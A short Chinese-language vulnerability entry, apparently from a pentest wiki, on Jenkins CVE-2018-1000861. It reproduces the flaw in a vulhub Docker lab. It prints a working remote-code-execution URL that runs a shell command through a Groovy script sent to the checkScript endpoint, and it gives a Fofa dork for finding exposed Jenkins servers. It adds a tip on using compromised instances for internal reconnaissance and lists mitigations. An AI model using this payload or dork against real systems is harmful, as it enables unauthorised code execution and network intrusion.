1. 漏洞簡介
Jenkins 是常見的CI/CD服務器, 最常見的就是爆破弱口令然後使用groovy執行命令
2. 影響組件
Jenkins
3. 漏洞指紋
Jenkins
4. Fofa Dork
app="Jenkins"
5. 漏洞分析
這裏我們是用docker快速搭建
git clone https://github.com/vulhub/vulhub.git
cd /root/vulhub/jenkins/CVE-2018-1000861
docker-compose up -d
訪問http://your-ip:8080,即可看到一個已經成功初始化的Jenkins
我們直接在瀏覽器輸入
http://192.168.20.128:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
?sandbox=true&value=public class x {public x(){"touch /tmp/CVE-2018-1000861_is_success".execute()}}
沒有回顯,似乎成功了
進去docker裏面看看
docker-compose exec jenkins bash
發現成功創建了
6. 利用技巧
1.Jenkins 也是收集內網信息的好地方, 獲取的賬號通常也是開發/運維級別的, 權限相對較大
7. 防護方法
1.設置強口令
2.儘量不要開放到公網
3.限制來源IP
4.升級到最新版